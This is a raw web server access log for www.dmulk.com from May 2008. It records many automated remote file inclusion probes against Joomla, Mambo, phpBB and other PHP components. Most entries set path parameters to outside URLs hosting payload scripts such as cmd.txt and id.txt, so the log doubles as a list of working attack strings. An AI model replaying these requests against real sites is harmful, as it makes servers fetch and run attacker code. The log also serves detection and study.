211.202.2.232 - - [05/May/2008:11:32:06 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:11:32:16 -0700] "GET /index.php?option=com_joomap&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:32:20 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:32:21 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:32:21 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:11:32:22 -0700] "GET /logs/access_080311.log/index.php?option=com_joomap&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:32:32 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.0.211.58 - - [05/May/2008:11:32:47 -0700] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.0.211.58 - - [05/May/2008:11:32:52 -0700] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 200 11606 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
207.58.179.218 - - [05/May/2008:11:32:53 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.58.179.218 - - [05/May/2008:11:32:53 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:11:33:01 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:11:33:01 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:11:33:02 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.69.211 - - [05/May/2008:11:33:23 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.69.211 - - [05/May/2008:11:33:28 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.144.180 - - [05/May/2008:11:34:04 -0700] "GET /logs/access_080228.log//83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:34:08 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:34:17 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:34:18 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:34:19 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:34:21 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:34:22 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:34:23 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.144.180 - - [05/May/2008:11:34:34 -0700] "GET /logs/access_080108.log//83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:35:57 -0700] "GET /logs/access_080312.log/start.php?id=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:35:58 -0700] "GET /start.php?id=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:35:58 -0700] "GET /logs/start.php?id=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:36:11 -0700] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:36:35 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:36:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:36:39 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:36:46 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:36:57 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:36:57 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:36:57 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:37:41 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:37:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:37:42 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:37:43 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:37:43 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:37:44 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.17.22 - - [05/May/2008:11:37:48 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ce.changwon.ac.kr/08new/mit/teszos? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.230.17.22 - - [05/May/2008:11:37:48 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ce.changwon.ac.kr/08new/mit/teszos? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:11:38:20 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 46131 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:11:38:26 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:38:48 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:38:59 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:38:59 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:39:00 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.165.148.225 - - [05/May/2008:11:39:03 -0700] "GET /logs/access_080228.log//config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.148.225 - - [05/May/2008:11:39:03 -0700] "GET /logs//config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:39:20 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:39:27 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:39:28 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [05/May/2008:11:39:36 -0700] "GET /logs//././tracking/userLog.php?rootSys=http://www.witherick.com/copper/lang/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.55.179.18 - - [05/May/2008:11:39:36 -0700] "GET //././tracking/userLog.php?rootSys=http://www.witherick.com/copper/lang/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
82.165.148.225 - - [05/May/2008:11:39:38 -0700] "GET /logs/access_080108.log//config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.76.29 - - [05/May/2008:11:39:45 -0700] "GET /logs/access_080228.log//1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.253.162.6 - - [05/May/2008:11:39:50 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.253.162.6 - - [05/May/2008:11:39:51 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.253.162.6 - - [05/May/2008:11:39:56 -0700] "GET //index.php?option=com_custompages&cpage=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [05/May/2008:11:40:22 -0700] "GET /logs/access_080108.log//1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:40:36 -0700] "GET /logs/access_080218.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:40:42 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:40:42 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:40:47 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.121.93.156 - - [05/May/2008:11:40:48 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.121.93.156 - - [05/May/2008:11:40:50 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
193.87.167.19 - - [05/May/2008:11:40:54 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:40:54 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:40:54 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:40:55 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:41:01 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:41:12 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:41:12 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:41:12 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:41:16 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [05/May/2008:11:41:16 -0700] "GET /logs/access_080215.log/account.php?action=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [05/May/2008:11:41:16 -0700] "GET /account.php?action=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [05/May/2008:11:41:17 -0700] "GET /logs/account.php?action=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.115 - - [05/May/2008:11:41:18 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 1121402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.184.242.48 - - [05/May/2008:11:41:20 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.242.48 - - [05/May/2008:11:41:21 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.242.48 - - [05/May/2008:11:41:21 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.121.93.156 - - [05/May/2008:11:41:37 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 1376256 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
194.121.93.156 - - [05/May/2008:11:41:37 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 2490368 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
83.184.242.48 - - [05/May/2008:11:41:37 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:11:41:38 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.235.226 - - [05/May/2008:11:42:03 -0700] "GET /logs/access_080228.log/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:42:08 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:42:12 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:42:13 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:42:14 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:42:15 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:42:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:42:16 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.125.235.226 - - [05/May/2008:11:42:38 -0700] "GET /logs/access_080108.log/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:42:50 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:42:51 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:42:55 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:42:55 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.179.218 - - [05/May/2008:11:43:00 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.179.218 - - [05/May/2008:11:43:00 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:11:43:05 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:11:43:06 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:11:43:06 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.4.3 - - [05/May/2008:11:43:15 -0700] "GET /extras/ext_cats.php?dir_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:43:36 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:43:41 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:43:41 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:43:56 -0700] "GET /logs/access_080215.log/account.php?action=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:43:57 -0700] "GET /account.php?action=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:43:57 -0700] "GET /logs/account.php?action=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:44:46 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:44:47 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.74 - - [05/May/2008:11:44:51 -0700] "GET /logs/access.log/account.php?action=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
